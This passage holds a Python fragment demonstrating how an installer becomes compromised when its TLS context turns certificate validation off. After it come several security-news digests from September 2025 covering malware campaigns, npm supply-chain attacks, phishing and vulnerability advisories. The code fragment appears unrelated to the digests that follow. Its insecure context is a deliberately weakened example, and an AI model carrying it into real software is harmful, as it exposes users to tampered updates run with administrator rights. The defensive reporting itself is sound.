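        return "blocked_by_digest"
    return "compromised" if payload == TAMPERED else "ok"


if __name__ == "__main__":
    print("hardened context:", attack_outcome(make_context_hardened(), GENUINE_SHA256))
    print("insecure context, digest checked:", attack_outcome(make_context_insecure(), GENUINE_SHA256))
    print("insecure context, no digest:", attack_outcome(make_context_insecure(), None))
```

The third outcome is the advisory's scenario: with validation off and no integrity check, whatever the network hands back is executed with the installer's administrator privileges. The digest check is worth keeping even with proper TLS, since it also covers a compromised update host.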
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2025-0006 ∗∗∗
---------------------------------------------
https://webkitgtk.org/security/WSA-2025-0006.html
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 19-09-2025 18:00 − Montag 22-09-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Guenes Holler
=====================
= News =
=====================
∗∗∗ Cyberattack on service provider disrupts airports in Europe ∗∗∗
---------------------------------------------
A service provider for passenger handling systems was attacked on Friday evening, as Berlin airport announced. [..] The system vendor's software is used at airports across Europe. [..] Passengers must now expect longer waiting times at check-in and boarding, as well as delays.
---------------------------------------------
https://www.heise.de/news/Cyberangriff-behindert-europaeische-Flughaefen-au…
∗∗∗ LastPass: Fake password managers infect Mac users with malware ∗∗∗
---------------------------------------------
LastPass is warning users of a campaign that targets macOS users with malicious software impersonating popular products delivered through fraudulent GitHub repositories. [..] The attackers created a large number of deceptive GitHub repositories from multiple accounts to evade takedown and optimize them to rank high in search results.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/lastpass-fake-password-manag…
∗∗∗ BlockBlasters: Infected Steam game downloads malware disguised as patch ∗∗∗
---------------------------------------------
A 2D platformer game called BlockBlasters has recently started showing signs of malicious activity after a patch release on August 30. While the user is playing the game, various bits of information are lifted from the PC the game is running on - including crypto wallet data. Hundreds of users are potentially affected.
---------------------------------------------
https://feeds.feedblitz.com/~/925181471/0/gdatasecurityblog-en~BlockBlaster…
∗∗∗ Understanding Spamhaus and Its Role in Email Security ∗∗∗
---------------------------------------------
One of the often “behind‐the‐scenes” organizations helping to defend email systems is Spamhaus. In this post, we’ll explain what Spamhaus is, how it works, why it matters, and what best practices companies should follow to stay out of blacklists and protect deliverability.
---------------------------------------------
https://blog.sucuri.net/2025/09/understanding-spamhaus-and-its-role-in-emai…
∗∗∗ Researchers Uncover GPT-4-Powered MalTerminal Malware Creating Ransomware, Reverse Shell ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered what they say is the earliest known example to date of malware that bakes in Large Language Model (LLM) capabilities. The malware has been codenamed MalTerminal by SentinelOne's SentinelLABS research team.
---------------------------------------------
https://thehackernews.com/2025/09/researchers-uncover-gpt-4-powered.html
∗∗∗ Beware of WKO phishing emails about alleged tax arrears! ∗∗∗
---------------------------------------------
Many companies are currently receiving a fake email that purports to come from the Austrian Federal Economic Chamber (Wirtschaftskammer Österreich, WKO). It claims there are outstanding charges of 482.00 euros that are to be paid via a link. Attention: do not pay, this is a fraud attempt!
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-vor-wko-phishing-mails-zu-an…
∗∗∗ Fake shops: criminals use the Finnish cult brand "Marimekko" as a cover ∗∗∗
---------------------------------------------
Advertisements promising unusually high discounts in Marimekko online shops are currently appearing more and more often on social media platforms. Naturally, none of it is true. The special prices are meant to lure fans of the Finnish design brand into impulse purchases. The ordered products are never delivered, and the money is gone.
---------------------------------------------
https://www.watchlist-internet.at/news/fake-shops-marimekko/
∗∗∗ Iranian Threat Actor Nimbus Manticore Expands Campaigns into Europe with Advanced Malware and Fake Job Lures ∗∗∗
---------------------------------------------
In this blog, we highlight the evolution of Minibike into a new variant dubbed MiniJunk, the use of fake recruiting portals for malware delivery, victimology across the Middle East and Western Europe, and the broader implications for defense, telecom, and aviation sectors.
---------------------------------------------
https://blog.checkpoint.com/research/iranian-threat-actor-nimbus-manticore-…
∗∗∗ Hacking with AI SASTs: An overview of ‘AI Security Engineers’ / ‘LLM Security Scanners’ for Penetration Testers and Security Teams ∗∗∗
---------------------------------------------
For the past few months, I have been trialing various AI-native security scanners, with a main focus on finding a product on the market today that is able to analyze the source code of a project in order to find vulnerabilities. This post will detail that journey, the successes and failures I’ve come across, my thoughts, and offer a general review of new on-the-market products that fit the category.
---------------------------------------------
https://joshua.hu/llm-engineer-review-sast-security-ai-tools-pentesters
∗∗∗ Kernel Security in the Wild: Side-Channel-Assisted Exploit Techniques, Kernel-Level Defenses, and Real-World Analysis ∗∗∗
---------------------------------------------
In this thesis, we address all three challenges to advance the state of kernel security. [..] We introduce three novel side channels: SLUBStick, a timing side channel on the kernel’s memory allocator to infer heap memory reuse; KernelSnitch, a software-induced side channel that leaks the location of kernel heap objects via data structure access timing; and a hardware-induced TLB side channel that leaks fine-grained memory layout information.
---------------------------------------------
https://tugraz.elsevierpure.com/ws/portalfiles/portal/98775241/main.pdf
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#780141: Cross-site scripting vulnerability in Lectora course navigation ∗∗∗
---------------------------------------------
Lectora Desktop versions 21.0–21.3 and Lectora Online versions 7.1.6 and older contained a cross-site scripting (XSS) vulnerability in courses published with Seamless Play Publish (SPP) enabled and Web Accessibility disabled. The vulnerability was initially patched in Lectora Desktop version 21.4 (October 25, 2022), but users must republish existing courses to apply the patch. CVE-2025-9125
---------------------------------------------
https://kb.cert.org/vuls/id/780141
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ffmpeg, jetty12, jetty9, jq, and pam), Fedora (curl, libssh, podman-tui, and prometheus-podman-exporter), Oracle (firefox, gnutls, kernel, and thunderbird), and SUSE (bluez, cairo, chromium, cmake, cups, firefox, frr, govulncheck-vulndb, kernel, kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-t, mariadb, mybatis, ognl, python-h2, and rke2).
---------------------------------------------
https://lwn.net/Articles/1039053/
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 18-09-2025 18:00 − Freitag 19-09-2025 18:00
Handler: Felician Fuchs
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Backup theft: attackers stole firewall configurations from SonicWall ∗∗∗
---------------------------------------------
Firewall vendor SonicWall reports a break-in into its customers' cloud accounts. Unknown actors copied and exfiltrated backup copies of firewall configuration files without authorization. However, this was not a cyberattack on SonicWall itself, but apparently mass trial of credentials. [..] The stolen configuration files can contain sensitive information and facilitate attacks. Apparently only a few customers are affected.
---------------------------------------------
https://heise.de/-10662565
∗∗∗ CISA exposes malware kits deployed in Ivanti EPMM attacks ∗∗∗
---------------------------------------------
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published an analysis of the malware deployed in attacks exploiting vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM). The flaws are an authentication bypass in EPMM’s API component (CVE-2025-4427) and a code injection vulnerability (CVE-2025-4428) that allows execution of arbitrary code.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisa-exposes-malware-kits-de…
∗∗∗ New attack on ChatGPT research agent pilfers secrets from Gmail inboxes ∗∗∗
---------------------------------------------
Today’s installment hits OpenAI’s Deep Research agent. Researchers recently devised an attack that plucked confidential information out of a user’s Gmail inbox and sent it to an attacker-controlled web server, with no interaction required on the part of the victim and no sign of exfiltration.
---------------------------------------------
https://arstechnica.com/information-technology/2025/09/new-attack-on-chatgp…
∗∗∗ Threat landscape for industrial automation systems in Q2 2025 ∗∗∗
---------------------------------------------
Kaspersky industrial threat report contains statistics on various malicious objects detected and blocked on ICS computers by Kaspersky solutions in Q2 2025.
---------------------------------------------
https://securelist.com/industrial-threat-report-q2-2025/117532/
∗∗∗ How AI-Native Development Platforms Enable Fake Captcha Pages ∗∗∗
---------------------------------------------
Cybercriminals are abusing AI-native platforms like Vercel, Netlify, and Lovable to host fake captcha pages that deceive users, bypass detection, and drive phishing campaigns.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/i/ai-development-platforms-ena…
=====================
= Vulnerabilities =
=====================
∗∗∗ Fortra Releases Critical Patch for CVSS 10.0 GoAnywhere MFT Vulnerability ∗∗∗
---------------------------------------------
Fortra has disclosed details of a critical security flaw in GoAnywhere Managed File Transfer (MFT) software that could result in the execution of arbitrary commands. The vulnerability, tracked as CVE-2025-10035, carries a CVSS score of 10.0, indicating maximum severity. "A deserialization vulnerability in the License Servlet of Fortra's GoAnywhere MFT allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection," Fortra said in an advisory released Thursday.
---------------------------------------------
https://thehackernews.com/2025/09/fortra-releases-critical-patch-for-cvss.h…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (chromium, cjson, and firefox-esr), Fedora (expat, gh, scap-security-guide, and xen), Oracle (container-tools:rhel8, firefox, grub2, and mysql:8.4), SUSE (busybox, busybox-links, element-web, kernel, shadowsocks-v2ray-plugin, and yt-dlp), and Ubuntu (imagemagick, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-hwe-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-azure, linux-azure-5.15, linux-azure-fips, linux-ibm, linux-ibm-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-raspi, linux-oracle-6.8, linux-realtime, and openjpeg2).
---------------------------------------------
https://lwn.net/Articles/1038802/
∗∗∗ CISA Releases Nine Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
ICSA-25-261-01 Westermo Network Technologies WeOS 5,
ICSA-25-261-02 Westermo Network Technologies WeOS 5,
ICSA-25-261-03 Schneider Electric Saitel DR & Saitel DP Remote Terminal Unit,
ICSA-25-261-04 Hitachi Energy Asset Suite,
ICSA-25-261-05 Hitachi Energy Service Suite,
ICSA-25-261-06 Cognex In-Sight Explorer and In-Sight Camera Firmware,
ICSA-25-261-07 Dover Fueling Solutions ProGauge MagLink LX4 Devices
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/09/18/cisa-releases-nine-indus…
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 17-09-2025 18:00 − Donnerstag 18-09-2025 18:00
Handler: Guenes Holler
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ ShinyHunters claims 1.5 billion Salesforce records stolen in Drift hacks ∗∗∗
---------------------------------------------
The ShinyHunters extortion group claims to have stolen over 1.5 billion Salesforce records from 760 companies using compromised Salesloft Drift OAuth tokens. For the past year, the threat actors have been targeting Salesforce customers in data theft attacks using social engineering and malicious OAuth applications to breach Salesforce instances and download data. The stolen data is then used to extort companies into paying a ransom to prevent the data from being publicly leaked.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/shinyhunters-claims-15-billi…
∗∗∗ SystemBC malware turns infected VPS systems into proxy highway ∗∗∗
---------------------------------------------
The operators of the SystemBC proxy botnet are hunting for vulnerable commercial virtual private servers (VPS) and maintain an average of 1,500 bots every day that provide a highway for malicious traffic. Compromised servers are located all over the world and have at least one unpatched critical vulnerability, some of them being plagued by tens of security issues.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/systembc-malware-turns-infec…
∗∗∗ Microsoft: hackers could probably have hijacked arbitrary Entra ID tenants ∗∗∗
---------------------------------------------
Security researcher Dirk-Jan Mollema discovered a dangerous vulnerability in Microsoft Entra ID, the cloud-based identity and access management platform used by many companies. As the researcher describes in a blog post, it allowed him to compromise virtually every Entra ID tenant worldwide, with the exception of national cloud deployments, which he could not test merely for lack of access.
---------------------------------------------
https://www.golem.de/news/microsoft-hacker-konnten-wohl-beliebige-entra-id-…
∗∗∗ SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PyPI) repository that are designed to deliver a remote access trojan called SilentSync on Windows systems.
---------------------------------------------
https://thehackernews.com/2025/09/silentsync-rat-delivered-via-two.html
∗∗∗ CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered a new malware loader codenamed CountLoader that has been put to use by Russian ransomware gangs to deliver post-exploitation tools like Cobalt Strike and AdaptixC2, and a remote access trojan known as PureHVNC RAT.
---------------------------------------------
https://thehackernews.com/2025/09/countloader-broadens-russian-ransomware.h…
∗∗∗ Phishing emails in the name of Statistik Austria in circulation ∗∗∗
---------------------------------------------
A phishing email purporting to come from Statistik Austria is currently circulating. In the message, companies are asked to submit sensitive financial and business data (e.g. lists of foreign business partners, amounts, payment deadlines). It is to be assumed that the data could be misused for fraudulent payment demands sent to business partners.
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-mails-im-namen-der-statisti…
∗∗∗ What We Know About the NPM Supply Chain Attack ∗∗∗
---------------------------------------------
On September 15, the Node Package Manager (NPM) repository experienced an ongoing supply chain attack, in which the attackers executed a highly targeted phishing campaign to compromise the account of an NPM package maintainer. With privileged access, the attackers injected malicious code into widely used JavaScript packages, threatening the entire software ecosystem. Notably, the attack has disrupted several key NPM packages, including those integral to application development and cryptography.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/i/npm-supply-chain-attack.html
∗∗∗ New Raven Stealer Malware Hits Browsers for Passwords and Payment Data ∗∗∗
---------------------------------------------
New research reveals Raven Stealer malware that targets browsers like Chrome and Edge to steal personal data. Learn how this threat uses simple tricks like process hollowing to evade antiviruses and why it’s a growing risk for everyday users.
---------------------------------------------
https://hackread.com/raven-stealer-malware-browsers-passwords-payment-data/
∗∗∗ Vane Viper Malvertising Network Posed as Legit Adtech in Global Scams ∗∗∗
---------------------------------------------
Cybersecurity firm Infoblox says it has discovered “Vane Viper,” a massive online ad network that posed as a legitimate business while running global scams and spreading malware. Linked to previously reported PropellerAds and its parent company AdTech Holding, the operation has been active for nearly a decade and is now being called one of the largest malvertising scams seen to date.
---------------------------------------------
https://hackread.com/vane-viper-malvertising-adtech-global-scams/
=====================
= Vulnerabilities =
=====================
∗∗∗ Emergency patch: actively exploited Chrome vulnerability endangers countless users ∗∗∗
---------------------------------------------
Google has released an emergency patch for its widely used Chrome web browser, closing several dangerous security vulnerabilities at once. One of them is already being actively exploited, as the release notes show. Users should therefore update the browser promptly to protect themselves from possible attacks. Affected are the Chrome versions for Windows, Mac and Linux.
---------------------------------------------
https://www.golem.de/news/notfallpatch-aktiv-ausgenutzte-chrome-luecke-gefa…
∗∗∗ Vulnerabilities threaten HPE Aruba Networking EdgeConnect SD-WAN ∗∗∗
---------------------------------------------
Attackers can attack wide area networks (WAN) built on HPE Aruba Networking EdgeConnect SD-WAN. The developers have recently closed several security vulnerabilities. After successful attacks, attackers can, among other things, bypass security restrictions or even execute malicious code to fully compromise systems.
---------------------------------------------
https://www.heise.de/news/Schwachstellen-bedrohen-HPE-Aruba-Networking-Edge…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gnutls, mysql:8.4, opentelemetry-collector, and python-cryptography), Debian (nextcloud-desktop), Fedora (chromium, firefox, forgejo, gitleaks, kernel, kernel-headers, lemonldap-ng, perl-Cpanel-JSON-XS, and python-pip), Red Hat (firefox and libxml2), Slackware (expat and mozilla), SUSE (avahi, bluez, cups, curl, firefox-esr, gdk-pixbuf, gstreamer, java-1_8_0-ibm, krb5, net-tools, podman, raptor, sevctl, tkimg, ucode-intel, and vim), and Ubuntu (linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux-fips, linux-azure-fips, linux-gcp-fips, and linux-gcp-6.14, linux-oracle, linux-oracle-6.14).
---------------------------------------------
https://lwn.net/Articles/1038638/
∗∗∗ Open-Source Tool Greenshot Hit by Severe Code Execution Vulnerability ∗∗∗
---------------------------------------------
A security vulnerability has been discovered in Greenshot, the widely used open-source screenshot tool for Windows. The Greenshot vulnerability exposes users to the risk of arbitrary code execution, potentially allowing attackers to bypass established security protocols and launch further malicious activities. A proof-of-concept (PoC) exploit has already been released, drawing attention to the critical nature of the vulnerability.
---------------------------------------------
https://thecyberexpress.com/greenshot-vulnerability/
∗∗∗ ENCS testers help resolve critical vulnerabilities in solar inverters ∗∗∗
---------------------------------------------
ENCS cybersecurity testers uncovered several vulnerabilities in consumer solar inverters widely used in Europe, as part of the work on consumer IoT equipment. We reported these to the Dutch Institute for Vulnerability Disclosure (DIVD) CSIRT to start a responsible vulnerability disclosure process. Six vulnerabilities have now been resolved by the manufacturers.
---------------------------------------------
https://encs.eu/news/encs-testers-help-resolve-critical-vulnerabilities-in-…
∗∗∗ ZDI-25-895: Wondershare Repairit Incorrect Permission Assignment Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-25-895/
∗∗∗ CVE-2025-9242: WatchGuard Firebox iked Out of Bounds Write Vulnerability ∗∗∗
---------------------------------------------
https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015
∗∗∗ Third-Party Libraries and Supply Chains - PSA-2025-09-17 ∗∗∗
---------------------------------------------
https://www.drupal.org/psa-2025-09-17
∗∗∗ Daikin Security Gateway ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-254-10
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 16-09-2025 18:00 − Mittwoch 17-09-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques ∗∗∗
---------------------------------------------
ClickFix isn't just back: it's mutating. New variants use fake CAPTCHAs, File Explorer tricks and MSI lures to drop MetaStealer. Stay ahead with Huntress Tradecraft Tuesday threat briefings.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/from-clickfix-to-metastealer…
∗∗∗ Critical Bugs in Chaos Mesh Enable Cluster Takeover ∗∗∗
---------------------------------------------
"Chaotic Deputy" is a set of four serious vulnerabilities in Chaos Mesh, the chaos engineering platform that many organizations use to test the resilience of their Kubernetes environments. Researchers at JFrog recently discovered the flaws, which give attackers a way to take over entire Kubernetes clusters.
---------------------------------------------
https://www.darkreading.com/cyber-risk/critical-bugs-chaos-mesh-cluster-tak…
∗∗∗ GOLD SALEM’s Warlock operation joins busy ransomware landscape ∗∗∗
---------------------------------------------
Counter Threat Unit (CTU) researchers are monitoring a threat group that refers to itself as Warlock Group. The group, which CTU researchers track as GOLD SALEM, has compromised networks and deployed its Warlock ransomware since March 2025.
---------------------------------------------
https://news.sophos.com/en-us/2025/09/17/gold-salems-warlock-operation-join…
∗∗∗ Scattered Spider Resurfaces With Financial Sector Attacks Despite Retirement Claims ∗∗∗
---------------------------------------------
Cybersecurity researchers have tied a fresh round of cyber attacks targeting financial services to the notorious cybercrime group known as Scattered Spider, casting doubt on their claims of going "dark". Threat intelligence firm ReliaQuest said it has observed indications that the threat actor has shifted their focus to the financial sector.
---------------------------------------------
https://thehackernews.com/2025/09/scattered-spider-resurfaces-with.html
∗∗∗ Microsoft seizes 338 websites to disrupt rapidly growing ‘RaccoonO365’ phishing service ∗∗∗
---------------------------------------------
Microsoft’s Digital Crimes Unit (DCU) has disrupted RaccoonO365, the fastest-growing tool used by cybercriminals to steal Microsoft 365 usernames and passwords (“credentials”).
---------------------------------------------
https://blogs.microsoft.com/on-the-issues/2025/09/16/microsoft-seizes-338-w…
∗∗∗ HybridPetya ransomware bypasses UEFI Secure Boot ∗∗∗
---------------------------------------------
ESET Research discovered HybridPetya on the sample-sharing platform VirusTotal. It is an imitator of the notorious Petya/NotPetya malware that additionally has the ability to compromise UEFI-based systems and to weaponize CVE-2024-7344 in order to bypass UEFI Secure Boot on outdated systems.
---------------------------------------------
https://www.welivesecurity.com/de/eset-research/ransomware-hybridpetya-hebe…
∗∗∗ Myth Busting: Why "Innocent Clicks" Don't Exist in Cybersecurity ∗∗∗
---------------------------------------------
Unit 42 explores how innocent clicks can have serious repercussions. Learn how simply visiting a malicious site can expose users to significant digital dangers.
---------------------------------------------
https://unit42.paloaltonetworks.com/why-innocent-clicks-dont-exist-in-cyber…
∗∗∗ The npm attack continues: "worm" infects packages ∗∗∗
---------------------------------------------
The supply chain attack on an npm developer account and 18 compromised packages appeared to have ended without major harm. Now it has become known that the attacks are continuing (via a different account) and that a self-replicating malware (Shai-Hulud) has already infected more than 500 npm packages.
---------------------------------------------
https://www.borncity.com/blog/2025/09/17/der-npm-angriff-geht-weiter-wurm-i…
∗∗∗ PyPI Token Exfiltration Campaign via GitHub Actions Workflows ∗∗∗
---------------------------------------------
I recently responded to an attack campaign where malicious actors injected code into GitHub Actions workflows attempting to steal PyPI publishing tokens. PyPI was not compromised, and no PyPI packages were published by the attackers.
---------------------------------------------
https://blog.pypi.org/posts/2025-09-16-github-actions-token-exfiltration/
∗∗∗ Ongoing Supply Chain Attack Targets CrowdStrike npm Packages ∗∗∗
---------------------------------------------
Socket detected multiple compromised CrowdStrike npm packages, continuing the "Shai-Hulud" supply chain attack that has now impacted nearly 500 packages.
---------------------------------------------
https://socket.dev/blog/ongoing-supply-chain-attack-targets-crowdstrike-npm…
∗∗∗ Microsoft: Office 2016 and Office 2019 reach end of support next month ∗∗∗
---------------------------------------------
Microsoft reminded customers again this week that Office 2016 and Office 2019 will reach the end of extended support in less than 30 days, on October 14, 2025.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-office-2016-and-o…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (container-tools:rhel8, kernel, and podman), Debian (node-sha.js), Fedora (firefox, kea, and perl-JSON-XS), Mageia (java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-latest-openjdk), Oracle (kernel, libarchive, podman, and python-cryptography), Red Hat (multiple packages, mysql:8.4, and python3.11), SUSE (expat, java-1_8_0-ibm, krb5, libavif, net-tools, nginx, nvidia-open-driver-G06-signed, onefetch, pcp, rabbitmq-server313, raptor, and vim), and Ubuntu (libyang2, linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-raspi, linux-raspi-5.4, linux-xilinx-zynqmp, linux-aws-fips, linux-fips, linux-gcp-fips, and python-xmltodict).
---------------------------------------------
https://lwn.net/Articles/1038453/
∗∗∗ CISA Releases Eight Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
CISA released eight Industrial Control Systems (ICS) advisories on September 16, 2025. The following products are affected: Schneider Electric Altivar Products, Schneider Electric ATVdPAC Module, Schneider Electric ILC992 InterLink Converter, Schneider Electric Galaxy VS, Schneider Electric Galaxy VL, Schneider Electric Galaxy VXL, Hitachi Energy RTU500 Series, Siemens SIMATIC NET CP, Siemens SINEMA, Siemens SCALANCE, Siemens RUGGEDCOM, Siemens SINEC NMS, Siemens Industrial Products (OpenSSL Vulnerability), Siemens Multiple Industrial Products and Delta Electronics DIALink.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/09/16/cisa-releases-eight-indu…
∗∗∗ CVE-2025-9708: Kubernetes C# Client, improper certificate validation in custom CA mode may lead to man-in-the-middle attacks ∗∗∗
---------------------------------------------
https://github.com/kubernetes/kubernetes/issues/134063
=====================
= End-of-Day report =
=====================
Timeframe: Montag 15-09-2025 18:00 − Dienstag 16-09-2025 18:00
Handler: Felician Fuchs
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ New large-scale npm attack: self-propagating malware infects dozens of packages ∗∗∗
---------------------------------------------
Various IT security companies are warning of new attacks on the npm ecosystem around node.js. Several dozen packages (at least 40, in one report as many as 150) are infected with malware that steals secrets and exfiltrates them via a webhook. The malware also replicates itself automatically, and is thus a worm. [..] It is still unclear where the attack began; the three analyzing companies do not name a clear "patient zero". [..] JavaScript developers, and in particular maintainers of packages hosted on npm, should exercise the greatest caution and consult the extensive list of infected packages.
---------------------------------------------
https://heise.de/-10651111
∗∗∗ Apple backports zero-day patches to older iPhones and iPads ∗∗∗
---------------------------------------------
Apple has released security updates to backport patches released last month to older iPhones and iPads, addressing a zero-day bug that was exploited in "extremely sophisticated" attacks. This security flaw is the same one Apple has patched for devices running iOS 18.6.2 and iPadOS 18.6.2, iPadOS 17.7.10, and macOS (Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8) on August 20.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/apple-backports-zero-day-pat…
∗∗∗ Patch status unclear: attackers are targeting the manufacturing management tool DELMIA Apriso ∗∗∗
---------------------------------------------
DELMIA Apriso is manufacturing operations management (MOM) software and a manufacturing execution system (MES) [..] The software's vendor, Dassault Systèmes, already mentioned the vulnerability (CVE-2025-5086, "critical") in June of this year in an extremely tersely worded advisory. [..] In early September, a security researcher at the SANS Institute's Internet Storm Center warned of exploitation attempts in a post. [..] It also remains unclear whether a security patch exists.
---------------------------------------------
https://www.heise.de/news/Patchstatus-unklar-Attacken-auf-Fertigungsmanagem…
∗∗∗ IServ: school solution with weakness included? ∗∗∗
---------------------------------------------
On 8 September 2025, someone noticed that the web front end of the IServ school server from IServ GmbH permits "user enumeration" in the broadest sense. If someone enters a person's name on a school's IServ login page and attempts to log in without knowing the password, that login naturally fails. So far everything is fine, since this login attempt is rejected. The problem is that the responses to these failed login attempts differ depending on whether the user account exists or not, and supposedly also depend on other conditions.
---------------------------------------------
https://www.borncity.com/blog/2025/09/16/iserve-schulloesung-mit-schwaeche-…
∗∗∗ Microsoft: Exchange 2016 and 2019 reach end of support in 30 days ∗∗∗
---------------------------------------------
Microsoft has reminded administrators again that Exchange 2016 and Exchange 2019 will reach the end of extended support next month and has provided guidance for decommissioning outdated servers.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-2016-and…
∗∗∗ Phoenix: new Rowhammer variant gives attackers root privileges ∗∗∗
---------------------------------------------
Researchers from Google and ETH Zurich have presented a new variant of the Rowhammer attack. It also affects modern DDR5 RAM modules, which were supposed to be protected against such attacks. [..] According to the discoverers' information page, the attack technique, named Phoenix, exploits a weakness in the Rowhammer countermeasures, which do not cover certain refresh intervals of the memory.
---------------------------------------------
https://www.golem.de/news/phoenix-neue-rowhammer-variante-verleiht-angreife…
∗∗∗ RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT ∗∗∗
---------------------------------------------
A Kaspersky GReAT expert takes a closer look at the RevengeHotels threat actor's new campaign, including AI-generated scripts, targeted phishing, and VenomRAT.
---------------------------------------------
https://securelist.com/revengehotels-attacks-with-ai-and-venomrat-across-la…
∗∗∗ New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site ∗∗∗
---------------------------------------------
Cybersecurity researchers have warned of a new campaign that's leveraging a variant of the FileFix social engineering tactic to deliver the StealC information stealer malware. "The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection," Acronis security researcher Eliad Kimhy said in a report shared with The Hacker News.
---------------------------------------------
https://thehackernews.com/2025/09/new-filefix-variant-delivers-stealc.html
∗∗∗ SmokeLoader Rises From the Ashes ∗∗∗
---------------------------------------------
Active since 2011, SmokeLoader (aka Smoke or Dofoil) is a popular malware loader that is designed to deliver second-stage payloads such as trojans, ransomware, and information stealers. [..] In May 2024, Operation Endgame, an international collaboration between law enforcement and private industry (which included Zscaler ThreatLabz) dismantled numerous instances of SmokeLoader and remotely removed the malware from infected systems. [..] ThreatLabz has identified two new SmokeLoader versions that are being used by multiple threat groups.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/smokeloader-rises-ashes
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel and kernel-rt), Debian (node-sha.js and python-django), Fedora (chromium, cups, exiv2, perl-Catalyst-Authentication-Credential-HTTP, perl-Catalyst-Plugin-Session, perl-Plack-Middleware-Session, and qemu), Red Hat (container-tools:rhel8, podman, and udisks2), SUSE (cargo-audit, cargo-c, cargo-packaging, and kernel-devel), and Ubuntu (libcpanel-json-xs-perl, libjson-xs-perl, rubygems, sqlite3, and vim).
---------------------------------------------
https://lwn.net/Articles/1038325/
∗∗∗ Spring Security and Spring Framework Release Fixes for CVE-2025-41248 and CVE-2025-41249 ∗∗∗
---------------------------------------------
https://spring.io/blog/2025/09/15/spring-framework-and-spring-security-fixe…
∗∗∗ LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover ∗∗∗
---------------------------------------------
https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass…
∗∗∗ Mozilla Security Advisories September 16, 2025 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/
∗∗∗ TYPO3-EXT-SA-2025-013: Vulnerability in bundled package in extension "Base Excel" (base_excel) ∗∗∗
---------------------------------------------
https://typo3.org/security/advisory/typo3-ext-sa-2025-013
∗∗∗ TYPO3-EXT-SA-2025-012: Cross-Site Scripting in extension "Form to Database" (form_to_database) ∗∗∗
---------------------------------------------
https://typo3.org/security/advisory/typo3-ext-sa-2025-012
∗∗∗ Synology-SA-25:11 Safe Access ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_25_11
=====================
= End-of-Day report =
=====================
Timeframe: Friday 12-09-2025 18:00 − Monday 15-09-2025 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Microsoft reminds of Windows 10 support ending in 30 days ∗∗∗
---------------------------------------------
On Friday, Microsoft reminded customers once again that Windows 10 will reach its end of support in 30 days, on October 14.
---------------------------------------------
